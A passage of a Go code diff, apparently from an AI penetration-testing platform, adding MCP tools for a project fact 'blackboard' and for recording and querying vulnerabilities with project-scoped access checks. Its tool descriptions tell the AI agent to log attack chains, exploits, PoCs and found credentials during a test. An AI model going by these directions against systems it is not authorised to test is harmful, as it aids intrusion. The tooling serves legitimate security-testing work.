mcpAuthorizationConversationID(ctx); conversationID != "" { + if db != nil { + if projectID, err := db.GetConversationProjectID(conversationID); err == nil { + if projectID = strings.TrimSpace(projectID); projectID != "" { + return projectID + } + } + } + return database.ProjectFilterUnbound + } + return "" +} diff --git a/internal/app/project_fact_tools.go b/internal/app/project_fact_tools.go new file mode 100644 index 00000000..2d570919 --- /dev/null +++ b/internal/app/project_fact_tools.go @@ -0,0 +1,389 @@ +package app + +import ( + "context" + "fmt" + "strings" + + "cyberstrike-ai/internal/agent" + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/database" + "cyberstrike-ai/internal/mcp" + "cyberstrike-ai/internal/mcp/builtin" + "cyberstrike-ai/internal/project" + + "go.uber.org/zap" +) + +func projectIDFromConversation(db *database.DB, ctx context.Context) (string, error) { + convID := agent.ConversationIDFromContext(ctx) + if convID == "" { + return "", fmt.Errorf("无法确定当前对话,请在对话上下文中使用项目事实工具") + } + pid, err := db.GetConversationProjectID(convID) + if err != nil { + return "", err + } + if strings.TrimSpace(pid) == "" { + return "", fmt.Errorf("当前对话未绑定项目,请先在对话中选择项目或创建带项目的对话") + } + return pid, nil +} + +func textResult(msg string, isErr bool) *mcp.ToolResult { + return &mcp.ToolResult{ + Content: []mcp.Content{{Type: "text", Text: msg}}, + IsError: isErr, + } +} + +// registerProjectFactTools 注册项目黑板 MCP 工具。 +func registerProjectFactTools(mcpServer *mcp.Server, db *database.DB, cfg *config.Config, logger *zap.Logger) { + if db == nil || cfg == nil || !cfg.Project.Enabled { + if logger != nil { + logger.Info("项目黑板工具未注册(未启用)") + } + return + } + + upsertTool := mcp.Tool{ + Name: builtin.ToolUpsertProjectFact, + Description: "写入或更新项目黑板事实,用于跨会话沉淀可复现上下文(非正式漏洞条目;可交付漏洞另用 record_vulnerability)。" + + "边渗透边记录:每确认新认知(端口/入口/凭据/可利用点)后立即调用,同 fact_key 覆盖更新,勿等会话结束。" + + "禁止仅写结论:summary 须含什么+在哪+如何验证;body 须含攻击链/请求响应/命令等复现细节。" + + "发现类建议 fact_key 为 finding|chain|exploit|poc/,category 对应 finding|chain|exploit|poc,body 按攻击链模板填写。" + + "环境类用 target|auth|infra|business/。同 fact_key 覆盖更新。需当前对话已绑定项目。", + ShortDescription: "写入/更新项目事实(含攻击链 body)", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "fact_key": map[string]interface{}{ + "type": "string", + "description": "项目内唯一 key:target/primary_domain、finding/sqli-login、exploit/upload-rce 等", + }, + "category": map[string]interface{}{ + "type": "string", + "description": "target | auth | infra | business | finding | chain | exploit | poc | note", + "enum": []string{"target", "auth", "infra", "business", "finding", "chain", "exploit", "poc", "note"}, + }, + "summary": map[string]interface{}{ + "type": "string", + "description": "索引用一行:结论 + 位置 + 触发/验证要点(勿仅写「存在 XSS」等空话)", + }, + "body": map[string]interface{}{ + "type": "string", + "description": "完整可复现详情(仅 get_project_fact 返回):须含攻击链步骤、原始 HTTP/命令、响应现象、证据与关联。" + + "发现/利用类首次写入必填;环境类建议含来源证据。攻击链类可参考模板章节:结论、目标与入口、攻击链、Exploit/POC、关键证据、关联、备注。" + + "更新已有 fact_key 时若省略或留空 body,将保留库中已有 body(可只改 summary)。", + }, + "confidence": map[string]interface{}{ + "type": "string", + "description": "confirmed | tentative | deprecated", + "enum": []string{"confirmed", "tentative", "deprecated"}, + }, + "pinned": map[string]interface{}{ + "type": "boolean", + "description": "是否优先出现在黑板索引", + }, + "related_vulnerability_id": map[string]interface{}{ + "type": "string", + "description": "可选:关联的漏洞记录 ID", + }, + "links": map[string]interface{}{ + "type": "array", + "description": "可选:关系边(from → 当前 fact)。finding 至少 1 条 {from:target/*, type:discovered_on};finding 上记录 exploit 用 {from:exploit/*, type:exploits}。省略保留已有边;传 [] 清空全部关系边。", + "items": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "from": map[string]interface{}{ + "type": "string", + "description": "来源 fact_key:存储为 from → 当前 fact", + }, + "type": map[string]interface{}{ + "type": "string", + "description": "depends_on | leads_to | enables | exploits | discovered_on | contains | part_of | supports", + }, + "confidence": map[string]interface{}{ + "type": "string", + "description": "confirmed | tentative | deprecated", + }, + }, + "required": []string{"from", "type"}, + }, + }, + }, + "required": []string{"fact_key", "summary"}, + }, + } + + mcpServer.RegisterTool(upsertTool, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + projectID, err := projectIDFromConversation(db, ctx) + if err != nil { + return textResult("错误: "+err.Error(), true), nil + } + factKey, _ := args["fact_key"].(string) + summary, _ := args["summary"].(string) + if strings.TrimSpace(factKey) == "" || strings.TrimSpace(summary) == "" { + return textResult("错误: fact_key 与 summary 必填", true), nil + } + if len([]rune(summary)) > cfg.Project.FactSummaryMaxRunesEffective() { + return textResult(fmt.Sprintf("错误: summary 过长(最多 %d 字)", cfg.Project.FactSummaryMaxRunesEffective()), true), nil + } + f := &database.ProjectFact{ + ProjectID: projectID, + FactKey: factKey, + Category: strArg(args, "category"), + Summary: summary, + Body: strArg(args, "body"), + Confidence: strArg(args, "confidence"), + Pinned: boolArg(args, "pinned"), + RelatedVulnerabilityID: strArg(args, "related_vulnerability_id"), + } + if convID := agent.ConversationIDFromContext(ctx); convID != "" { + f.SourceConversationID = convID + } + created, err := db.UpsertProjectFact(f) + if err != nil { + return textResult("错误: "+err.Error(), true), nil + } + if _, hasLinks := args["links"]; hasLinks { + linkInputs, err := project.ParseFactLinkInputs(args["links"]) + if err != nil { + return textResult("错误: "+err.Error(), true), nil + } + convID := agent.ConversationIDFromContext(ctx) + if err := project.PersistFactLinksFromParsed(db, projectID, created.FactKey, convID, linkInputs, true); err != nil { + return textResult("错误: 保存关系边失败: "+err.Error(), true), nil + } + created, _ = db.GetProjectFactByKey(projectID, created.FactKey) + } else if parsed := project.ParseLinksFromBody(created.Body); len(parsed) > 0 { + if err := project.PersistFactIncomingLinks(db, projectID, created.FactKey, parsed, true); err != nil { + return textResult("错误: 从 body 解析边失败: "+err.Error(), true), nil + } + created, _ = db.GetProjectFactByKey(projectID, created.FactKey) + } + msg := fmt.Sprintf("事实已保存。\nfact_key: %s\nid: %s\nconfidence: %s", created.FactKey, created.ID, created.Confidence) + if in, _ := db.ListIncomingProjectFactEdges(projectID, created.FactKey); len(in) > 0 { + msg += "\n关系边: " + project.FormatFactLinksText(in) + } + if warn := project.SparseBodyWarningIfNeeded(f.Category, f.FactKey, f.Body); warn != "" { + msg += warn + } + return textResult(msg, false), nil + }) + + getTool := mcp.Tool{ + Name: builtin.ToolGetProjectFact, + Description: "按 fact_key 获取项目事实完整 body 与元数据。摘要不足时必须调用本工具,禁止臆造细节。", + ShortDescription: "按 key 获取事实详情", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "fact_key": map[string]interface{}{"type": "string", "description": "事实 key"}, + }, + "required": []string{"fact_key"}, + }, + } + mcpServer.RegisterTool(getTool, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + projectID, err := projectIDFromConversation(db, ctx) + if err != nil { + return textResult("错误: "+err.Error(), true), nil + } + key := strings.TrimSpace(strArg(args, "fact_key")) + if key == "" { + return textResult("错误: fact_key 必填", true), nil + } + f, err := db.GetProjectFactByKey(projectID, key) + if err != nil { + return textResult("错误: "+err.Error(), true), nil + } + msg := fmt.Sprintf("fact_key: %s\ncategory: %s\nconfidence: %s\nsummary: %s\nupdated_at: %s", + f.FactKey, f.Category, f.Confidence, f.Summary, f.UpdatedAt.Format("2006-01-02 15:04:05")) + if f.RelatedVulnerabilityID != "" { + msg += fmt.Sprintf("\nrelated_vulnerability_id: %s", f.RelatedVulnerabilityID) + } + if f.SourceConversationID != "" { + msg += fmt.Sprintf("\nsource_conversation_id: %s", f.SourceConversationID) + } + if in, _ := db.ListIncomingProjectFactEdges(projectID, f.FactKey); len(in) > 0 { + msg += "\n关系边(from → 本 fact):\n" + for _, e := range in { + msg += fmt.Sprintf("- %s ← %s (%s)\n", e.EdgeType, e.SourceFactKey, e.Confidence) + } + } + if out, _ := db.ListOutgoingProjectFactEdges(projectID, f.FactKey); len(out) > 0 { + msg += "指向其他事实:\n" + for _, e := range out { + msg += fmt.Sprintf("- %s → %s (%s)\n", e.EdgeType, e.TargetFactKey, e.Confidence) + } + } + msg += "\n\n--- body ---\n" + f.Body + if warn := project.SparseBodyWarningIfNeeded(f.Category, f.FactKey, f.Body); warn != "" { + msg += warn + } + return textResult(msg, false), nil + }) + + listTool := mcp.Tool{ + Name: builtin.ToolListProjectFacts, + Description: "列出当前项目的事实(分页)。", + ShortDescription: "列出项目事实", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "category": map[string]interface{}{"type": "string"}, + "confidence": map[string]interface{}{"type": "string"}, + "limit": map[string]interface{}{"type": "integer"}, + "offset": map[string]interface{}{"type": "integer"}, + }, + }, + } + mcpServer.RegisterTool(listTool, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + projectID, err := projectIDFromConversation(db, ctx) + if err != nil { + return textResult("错误: "+err.Error(), true), nil + } + limit := intArg(args, "limit", 50) + offset := intArg(args, "offset", 0) + filter := database.ProjectFactListFilter{ + Category: strArg(args, "category"), + Confidence: strArg(args, "confidence"), + } + list, err := db.ListProjectFacts(projectID, filter, limit, offset) + if err != nil { + return textResult("错误: "+err.Error(), true), nil + } + var b strings.Builder + b.WriteString(fmt.Sprintf("共 %d 条(limit=%d offset=%d):\n", len(list), limit, offset)) + for _, f := range list { + b.WriteString(fmt.Sprintf("- [%s] %s — %s (%s)\n", f.FactKey, f.Category, f.Summary, f.Confidence)) + } + return textResult(b.String(), false), nil + }) + + searchTool := mcp.Tool{ + Name: builtin.ToolSearchProjectFacts, + Description: "按关键词搜索项目事实(summary/body/fact_key)。", + ShortDescription: "搜索项目事实", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "query": map[string]interface{}{"type": "string"}, + "limit": map[string]interface{}{"type": "integer"}, + "offset": map[string]interface{}{"type": "integer"}, + }, + "required": []string{"query"}, + }, + } + mcpServer.RegisterTool(searchTool, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + projectID, err := projectIDFromConversation(db, ctx) + if err != nil { + return textResult("错误: "+err.Error(), true), nil + } + q := strings.TrimSpace(strArg(args, "query")) + if q == "" { + return textResult("错误: query 必填", true), nil + } + list, err := db.ListProjectFacts(projectID, database.ProjectFactListFilter{Search: q}, intArg(args, "limit", 30), intArg(args, "offset", 0)) + if err != nil { + return textResult("错误: "+err.Error(), true), nil + } + var b strings.Builder + b.WriteString(fmt.Sprintf("搜索 \"%s\" 命中 %d 条:\n", q, len(list))) + for _, f := range list { + b.WriteString(fmt.Sprintf("- [%s] %s — %s\n", f.FactKey, f.Category, f.Summary)) + } + return textResult(b.String(), false), nil + }) + + deprecateTool := mcp.Tool{ + Name: builtin.ToolDeprecateProjectFact, + Description: "将事实标记为 deprecated,从黑板索引中排除。", + ShortDescription: "废弃项目事实", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "fact_key": map[string]interface{}{"type": "string"}, + }, + "required": []string{"fact_key"}, + }, + } + mcpServer.RegisterTool(deprecateTool, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + projectID, err := projectIDFromConversation(db, ctx) + if err != nil { + return textResult("错误: "+err.Error(), true), nil + } + key := strings.TrimSpace(strArg(args, "fact_key")) + if err := db.DeprecateProjectFact(projectID, key); err != nil { + return textResult("错误: "+err.Error(), true), nil + } + return textResult("事实已标记为 deprecated: "+key, false), nil + }) + + restoreTool := mcp.Tool{ + Name: builtin.ToolRestoreProjectFact, + Description: "将已废弃(deprecated)的事实恢复为 tentative 或 confirmed,重新参与黑板索引。", + ShortDescription: "恢复已废弃的项目事实", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "fact_key": map[string]interface{}{"type": "string"}, + "confidence": map[string]interface{}{ + "type": "string", + "description": "恢复后的置信度:tentative(默认)或 confirmed", + "enum": []string{"tentative", "confirmed"}, + }, + }, + "required": []string{"fact_key"}, + }, + } + mcpServer.RegisterTool(restoreTool, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + projectID, err := projectIDFromConversation(db, ctx) + if err != nil { + return textResult("错误: "+err.Error(), true), nil + } + key := strings.TrimSpace(strArg(args, "fact_key")) + if key == "" { + return textResult("错误: fact_key 必填", true), nil + } + conf := strArg(args, "confidence") + if err := db.RestoreProjectFact(projectID, key, conf); err != nil { + return textResult("错误: "+err.Error(), true), nil + } + if conf == "" { + conf = "tentative" + } + return textResult(fmt.Sprintf("事实已恢复为 %s: %s", conf, key), false), nil + }) + + if logger != nil { + logger.Debug("项目黑板 MCP 工具注册成功") + } +} + +func strArg(args map[string]interface{}, key string) string { + if v, ok := args[key].(string); ok { + return v + } + return "" +} + +func boolArg(args map[string]interface{}, key string) bool { + if v, ok := args[key].(bool); ok { + return v + } + return false +} + +func intArg(args map[string]interface{}, key string, def int) int { + switch v := args[key].(type) { + case float64: + return int(v) + case int: + return v + case int64: + return int(v) + default: + return def + } +} diff --git a/internal/app/vision_tools.go b/internal/app/vision_tools.go new file mode 100644 index 00000000..f833588a --- /dev/null +++ b/internal/app/vision_tools.go @@ -0,0 +1,13 @@ +package app + +import ( + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/mcp" + "cyberstrike-ai/internal/vision" + + "go.uber.org/zap" +) + +func registerVisionTools(mcpServer *mcp.Server, cfg *config.Config, logger *zap.Logger) { + vision.RegisterAnalyzeImageTool(mcpServer, cfg, logger) +} diff --git a/internal/app/vulnerability_tools.go b/internal/app/vulnerability_tools.go new file mode 100644 index 00000000..54d37819 --- /dev/null +++ b/internal/app/vulnerability_tools.go @@ -0,0 +1,466 @@ +package app + +import ( + "context" + "fmt" + "strings" + + "cyberstrike-ai/internal/agent" + "cyberstrike-ai/internal/authctx" + "cyberstrike-ai/internal/database" + "cyberstrike-ai/internal/mcp" + "cyberstrike-ai/internal/mcp/builtin" + + "go.uber.org/zap" +) + +func conversationIDFromToolCtx(ctx context.Context) string { + if id := agent.ConversationIDFromContext(ctx); id != "" { + return id + } + return mcp.MCPConversationIDFromContext(ctx) +} + +// canAccessVulnerability 校验当前对话是否有权查看该漏洞(默认项目隔离,未绑项目则仅本会话)。 +func canAccessVulnerability(vuln *database.Vulnerability, convID, projectID string) bool { + if vuln == nil || convID == "" { + return false + } + if projectID != "" { + if strings.TrimSpace(vuln.ProjectID) == projectID { + return true + } + // 历史记录:写入时尚未绑定 project_id,但属于同一会话 + if strings.TrimSpace(vuln.ProjectID) == "" && vuln.ConversationID == convID { + return true + } + return false + } + return vuln.ConversationID == convID +} + +func buildVulnerabilityListFilter(db *database.DB, ctx context.Context, args map[string]interface{}) (database.VulnerabilityListFilter, string, error) { + convID := conversationIDFromToolCtx(ctx) + if convID == "" { + return database.VulnerabilityListFilter{}, "", fmt.Errorf("无法确定当前对话,请在对话上下文中使用漏洞查询工具") + } + + projectID := "" + if pid, err := db.GetConversationProjectID(convID); err == nil { + projectID = strings.TrimSpace(pid) + } + + scope := strings.TrimSpace(strArg(args, "scope")) + if scope == "" { + if projectID != "" { + scope = "project" + } else { + scope = "conversation" + } + } + + filter := database.VulnerabilityListFilter{ + Severity: strings.TrimSpace(strArg(args, "severity")), + Status: strings.TrimSpace(strArg(args, "status")), + } + if q := strings.TrimSpace(strArg(args, "q")); q != "" { + filter.Search = q + } else { + filter.Search = strings.TrimSpace(strArg(args, "search")) + } + + var scopeLabel string + switch scope { + case "project": + if projectID == "" { + return filter, "", fmt.Errorf("当前对话未绑定项目,无法按项目列出漏洞;请使用 scope=conversation,或先在对话中绑定项目") + } + filter.ProjectID = projectID + scopeLabel = fmt.Sprintf("项目 %s", projectID) + case "conversation": + filter.ConversationID = convID + scopeLabel = fmt.Sprintf("会话 %s", convID) + default: + return filter, "", fmt.Errorf("scope 仅支持 project 或 conversation,当前值: %s", scope) + } + return filter, scopeLabel, nil +} + +func formatVulnerabilityListItem(v *database.Vulnerability) string { + line := fmt.Sprintf("- id=%s | %s | %s | %s", v.ID, v.Severity, v.Status, v.Title) + if v.Type != "" { + line += fmt.Sprintf(" | type=%s", v.Type) + } + if v.Target != "" { + line += fmt.Sprintf(" | target=%s", truncateRunes(v.Target, 80)) + } + return line +} + +func formatVulnerabilityDetail(v *database.Vulnerability) string { + var b strings.Builder + b.WriteString(fmt.Sprintf("漏洞ID: %s\n", v.ID)) + b.WriteString(fmt.Sprintf("标题: %s\n", v.Title)) + b.WriteString(fmt.Sprintf("严重程度: %s\n", v.Severity)) + b.WriteString(fmt.Sprintf("状态: %s\n", v.Status)) + if v.Type != "" { + b.WriteString(fmt.Sprintf("类型: %s\n", v.Type)) + } + if v.Target != "" { + b.WriteString(fmt.Sprintf("目标: %s\n", v.Target)) + } + if v.ProjectID != "" { + b.WriteString(fmt.Sprintf("项目ID: %s\n", v.ProjectID)) + } + b.WriteString(fmt.Sprintf("会话ID: %s\n", v.ConversationID)) + if !v.CreatedAt.IsZero() { + b.WriteString(fmt.Sprintf("创建时间: %s\n", v.CreatedAt.Format("2006-01-02 15:04:05"))) + } + if v.Description != "" { + b.WriteString("\n--- 描述 ---\n") + b.WriteString(v.Description) + b.WriteString("\n") + } + if v.Preconditions != "" { + b.WriteString("\n--- 前置条件 ---\n") + b.WriteString(v.Preconditions) + b.WriteString("\n") + } + if v.ReproSteps != "" { + b.WriteString("\n--- 复现步骤 ---\n") + b.WriteString(v.ReproSteps) + b.WriteString("\n") + } + if v.Evidence != "" { + b.WriteString("\n--- 证据 / POC ---\n") + b.WriteString(v.Evidence) + b.WriteString("\n") + } + if v.Impact != "" { + b.WriteString("\n--- 影响 ---\n") + b.WriteString(v.Impact) + b.WriteString("\n") + } + if v.Recommendation != "" { + b.WriteString("\n--- 修复建议 ---\n") + b.WriteString(v.Recommendation) + b.WriteString("\n") + } + if v.RetestNotes != "" { + b.WriteString("\n--- 复测方式 ---\n") + b.WriteString(v.RetestNotes) + b.WriteString("\n") + } + return b.String() +} + +func missingVulnerabilityReproFields(args map[string]interface{}) []string { + required := []struct { + key string + label string + }{ + {"target", "target(受影响的 URL/IP/服务/接口)"}, + {"vulnerability_type", "vulnerability_type(漏洞类型)"}, + {"description", "description(漏洞摘要与触发点)"}, + {"reproduction_steps", "reproduction_steps(可逐步执行的复现步骤)"}, + {"evidence", "evidence(POC、原始请求/响应、命令输出或截图/日志证据)"}, + {"impact", "impact(确认后的实际影响)"}, + {"recommendation", "recommendation(修复建议)"}, + } + missing := make([]string, 0) + for _, item := range required { + if strings.TrimSpace(strArg(args, item.key)) == "" { + missing = append(missing, item.label) + } + } + return missing +} + +func truncateRunes(s string, max int) string { + r := []rune(s) + if len(r) <= max { + return s + } + return string(r[:max]) + "…" +} + +// registerVulnerabilityTools 注册漏洞记录与查询 MCP 工具。 +func registerVulnerabilityTools(mcpServer *mcp.Server, db *database.DB, logger *zap.Logger) { + registerRecordVulnerabilityTool(mcpServer, db, logger) + registerListVulnerabilitiesTool(mcpServer, db, logger) + registerGetVulnerabilityTool(mcpServer, db, logger) + if logger != nil { + logger.Debug("漏洞 MCP 工具注册成功", zap.Strings("tools", []string{ + builtin.ToolRecordVulnerability, + builtin.ToolListVulnerabilities, + builtin.ToolGetVulnerability, + })) + } +} + +func registerRecordVulnerabilityTool(mcpServer *mcp.Server, db *database.DB, logger *zap.Logger) { + tool := mcp.Tool{ + Name: builtin.ToolRecordVulnerability, + Description: "记录发现的漏洞详情到漏洞管理系统。必须按“仅看本记录即可复现”的标准填写:目标、漏洞类型、触发点、复现步骤、证据/POC、实际影响和修复建议;前置条件与复测方式为推荐填写项。边渗透边记录:每验证出一条可复现漏洞后立即调用,勿等会话结束。记录前可先 list_vulnerabilities 避免重复。", + ShortDescription: "记录可复现的漏洞详情到漏洞管理系统", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "title": map[string]interface{}{ + "type": "string", + "description": "漏洞标题(必需)。建议格式:<资产/接口> 存在 <漏洞类型>,例如“/api/login 存在 SQL 注入”。", + }, + "description": map[string]interface{}{ + "type": "string", + "description": "漏洞摘要与触发点(必需):说明哪个功能/参数/入口存在问题、为什么可被利用。不要只写结论。", + }, + "severity": map[string]interface{}{ + "type": "string", + "description": "漏洞严重程度:critical(严重)、high(高)、medium(中)、low(低)、info(信息)", + "enum": []string{"critical", "high", "medium", "low", "info"}, + }, + "vulnerability_type": map[string]interface{}{ + "type": "string", + "description": "漏洞类型,如:SQL注入、XSS、CSRF、命令注入等(必需)", + }, + "target": map[string]interface{}{ + "type": "string", + "description": "受影响的目标(必需):尽量精确到 URL、IP:端口、服务名、接口路径和参数名。", + }, + "preconditions": map[string]interface{}{ + "type": "string", + "description": "前置条件(推荐填写):登录状态、权限、账号、Header/Cookie、特定数据、网络位置、环境/版本等;无前置条件可写“无”。", + }, + "reproduction_steps": map[string]interface{}{ + "type": "string", + "description": "复现步骤(必需):按 1/2/3 编号,写清入口、参数、payload、执行命令、观察点。应让未参与对话的人照做即可复现。", + }, + "evidence": map[string]interface{}{ + "type": "string", + "description": "证据 / POC(必需):原始 HTTP 请求/响应、curl/工具命令、截图文字说明、日志、DNSLog/回连记录、数据库结果、文件路径、时间戳等。优先放最小可验证证据。", + }, + "impact": map[string]interface{}{ + "type": "string", + "description": "漏洞影响说明(必需):结合已验证事实说明可造成什么后果,避免泛泛而谈。", + }, + "recommendation": map[string]interface{}{ + "type": "string", + "description": "修复建议(必需):给出针对该触发点/参数/组件的具体修复和复测建议。", + }, + "retest_notes": map[string]interface{}{ + "type": "string", + "description": "复测方式(推荐填写):修复后如何验证漏洞已关闭,包括应返回的状态码、错误信息或访问控制结果。", + }, + }, + "required": []string{"title", "description", "severity", "vulnerability_type", "target", "reproduction_steps", "evidence", "impact", "recommendation"}, + }, + } + + mcpServer.RegisterTool(tool, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + conversationID := strings.TrimSpace(strArg(args, "conversation_id")) + if conversationID == "" { + conversationID = conversationIDFromToolCtx(ctx) + } + if conversationID == "" { + return textResult("错误: conversation_id 未设置。这是系统错误,请重试。", true), nil + } + + title := strings.TrimSpace(strArg(args, "title")) + if title == "" { + return textResult("错误: title 参数必需且不能为空", true), nil + } + + severity := strings.TrimSpace(strArg(args, "severity")) + if severity == "" { + return textResult("错误: severity 参数必需且不能为空", true), nil + } + + validSeverities := map[string]bool{ + "critical": true, "high": true, "medium": true, "low": true, "info": true, + } + if !validSeverities[severity] { + return textResult(fmt.Sprintf("错误: severity 必须是 critical、high、medium、low 或 info 之一,当前值: %s", severity), true), nil + } + if missing := missingVulnerabilityReproFields(args); len(missing) > 0 { + return textResult("错误: 漏洞记录缺少必填信息,请补充后再记录:\n- "+strings.Join(missing, "\n- ")+"\n\n必填项用于确保单条记录可独立复现;前置条件和复测方式为推荐填写项。", true), nil + } + + projectID := "" + if pid, perr := db.GetConversationProjectID(conversationID); perr == nil { + projectID = strings.TrimSpace(pid) + } + + vuln := &database.Vulnerability{ + ConversationID: conversationID, + ProjectID: projectID, + Title: title, + Description: strArg(args, "description"), + Severity: severity, + Status: "open", + Type: strArg(args, "vulnerability_type"), + Target: strArg(args, "target"), + Preconditions: strArg(args, "preconditions"), + ReproSteps: strArg(args, "reproduction_steps"), + Evidence: strArg(args, "evidence"), + Impact: strArg(args, "impact"), + Recommendation: strArg(args, "recommendation"), + RetestNotes: strArg(args, "retest_notes"), + } + + created, err := db.CreateVulnerability(vuln) + if err != nil { + if logger != nil { + logger.Error("记录漏洞失败", zap.Error(err)) + } + return textResult(fmt.Sprintf("记录漏洞失败: %v", err), true), nil + } + if principal, ok := authctx.PrincipalFromContext(ctx); ok { + _ = db.SetResourceOwner("vulnerability", created.ID, principal.UserID) + _ = db.AssignResourceToUser(principal.UserID, "vulnerability", created.ID) + } + db.NotifyVulnerabilityCreated(created) + + if logger != nil { + logger.Info("漏洞记录成功", + zap.String("id", created.ID), + zap.String("title", created.Title), + zap.String("severity", created.Severity), + zap.String("conversation_id", conversationID), + ) + } + + return textResult(fmt.Sprintf("漏洞已成功记录!\n\n漏洞ID: %s\n标题: %s\n严重程度: %s\n状态: %s\n\n可使用 get_vulnerability(id) 查看详情,或 list_vulnerabilities 查看列表。", + created.ID, created.Title, created.Severity, created.Status), false), nil + }) +} + +func registerListVulnerabilitiesTool(mcpServer *mcp.Server, db *database.DB, logger *zap.Logger) { + tool := mcp.Tool{ + Name: builtin.ToolListVulnerabilities, + Description: "列出当前授权范围内的漏洞(摘要)。默认:对话已绑定项目时列出该项目下全部漏洞;未绑项目时仅列出当前会话漏洞。可用 scope=conversation 仅看本会话。记录新漏洞前建议先调用以避免重复。", + ShortDescription: "列出漏洞(默认当前项目)", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "scope": map[string]interface{}{ + "type": "string", + "description": "范围:project(默认,需绑定项目)| conversation(仅当前会话)", + "enum": []string{"project", "conversation"}, + }, + "severity": map[string]interface{}{ + "type": "string", + "description": "按严重程度筛选:critical、high、medium、low、info", + "enum": []string{"critical", "high", "medium", "low", "info"}, + }, + "status": map[string]interface{}{ + "type": "string", + "description": "按状态筛选:open、confirmed、fixed、false_positive、ignored", + "enum": []string{"open", "confirmed", "fixed", "false_positive", "ignored"}, + }, + "q": map[string]interface{}{ + "type": "string", + "description": "关键词搜索(标题、描述、类型、目标等)", + }, + "limit": map[string]interface{}{ + "type": "integer", + "description": "返回条数上限,默认 30,最大 100", + }, + "offset": map[string]interface{}{ + "type": "integer", + "description": "分页偏移,默认 0", + }, + }, + }, + } + + mcpServer.RegisterTool(tool, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + filter, scopeLabel, err := buildVulnerabilityListFilter(db, ctx, args) + if err != nil { + return textResult("错误: "+err.Error(), true), nil + } + + limit := intArg(args, "limit", 30) + if limit <= 0 || limit > 100 { + limit = 30 + } + offset := intArg(args, "offset", 0) + if offset < 0 { + offset = 0 + } + + total, err := db.CountVulnerabilities(filter) + if err != nil { + if logger != nil { + logger.Warn("统计漏洞失败", zap.Error(err)) + } + total = 0 + } + + list, err := db.ListVulnerabilities(limit, offset, filter) + if err != nil { + return textResult("错误: "+err.Error(), true), nil + } + + var b strings.Builder + b.WriteString(fmt.Sprintf("范围: %s\n总计: %d | 本页: %d 条 (limit=%d offset=%d)\n\n", scopeLabel, total, len(list), limit, offset)) + if len(list) == 0 { + b.WriteString("(暂无漏洞记录)\n") + } else { + for _, v := range list { + b.WriteString(formatVulnerabilityListItem(v)) + b.WriteString("\n") + } + if total > offset+len(list) { + b.WriteString(fmt.Sprintf("\n(还有更多,可增大 offset 或使用 q/severity/status 筛选)\n")) + } + } + b.WriteString("\n需要 POC 与完整字段请对具体 id 调用 get_vulnerability。") + return textResult(b.String(), false), nil + }) +} + +func registerGetVulnerabilityTool(mcpServer *mcp.Server, db *database.DB, logger *zap.Logger) { + tool := mcp.Tool{ + Name: builtin.ToolGetVulnerability, + Description: "按漏洞 ID 获取完整详情(含 POC、影响、修复建议)。仅能访问当前项目或当前会话下的漏洞(与 list_vulnerabilities 授权范围一致)。", + ShortDescription: "按 ID 获取漏洞详情", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "id": map[string]interface{}{ + "type": "string", + "description": "漏洞 ID(list_vulnerabilities 返回的 id)", + }, + }, + "required": []string{"id"}, + }, + } + + mcpServer.RegisterTool(tool, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + convID := conversationIDFromToolCtx(ctx) + if convID == "" { + return textResult("错误: 无法确定当前对话,请在对话上下文中使用本工具", true), nil + } + + id := strings.TrimSpace(strArg(args, "id")) + if id == "" { + return textResult("错误: id 必填", true), nil + } + + vuln, err := db.GetVulnerability(id) + if err != nil { + return textResult("错误: 漏洞不存在或查询失败", true), nil + } + + projectID := "" + if pid, perr := db.GetConversationProjectID(convID); perr == nil { + projectID = strings.TrimSpace(pid) + } + + if !canAccessVulnerability(vuln, convID, projectID) { + return textResult("错误: 无权访问该漏洞(仅可查看当前项目或当前会话下的记录)", true), nil + } + + return textResult(formatVulnerabilityDetail(vuln), false), nil + }) +} diff --git a/internal/database/asset.go b/internal/database/asset.go new file mode 100644 index 00000000..846bb25a --- /dev/null +++ b/internal/database/asset.go @@ -0,0 +1,1373 @@ +package database + +import ( + "database/sql" + "encoding/json" + "fmt" + "net" + "net/url" + "regexp" + "strconv" + "strings" + "time" + "unicode/utf8" + + "github.com/google/uuid" + "go.uber.org/zap" + "golang.org/x/net/idna" +) + +// Asset is a persistent, deduplicated target discovered manually or by recon providers. +type Asset struct { + ID string `json:"id"` + ProjectID string `json:"project_id,omitempty"` + ProjectName string `json:"project_name,omitempty"` + Host string `json:"host"` + IP string `json:"ip"` + Port int `json:"port"` + Domain string `json:"domain"` + Protocol string `json:"protocol"` + Title string `json:"title"` + Server string `json:"server"` + Country string `json:"country"` + Province string `json:"province"` + City string `json:"city"` + ResponsiblePerson string `json:"responsible_person"` + Department string `json:"department"` + BusinessSystem string `json:"business_system"` + Environment string `json:"environment"` + Criticality string `json:"criticality"` + Source string `json:"source"` + SourceQuery string `json:"source_query"` + Status string `json:"status"` + Tags []string `json:"tags"` + FirstSeenAt time.Time `json:"first_seen_at"` + LastSeenAt time.Time `json:"last_seen_at"` + CreatedAt time.Time `json:"created_at"` + UpdatedAt time.Time `json:"updated_at"` + LastScanAt *time.Time `json:"last_scan_at,omitempty"` + LastScanConversationID string `json:"last_scan_conversation_id,omitempty"` + LastScanQueueID 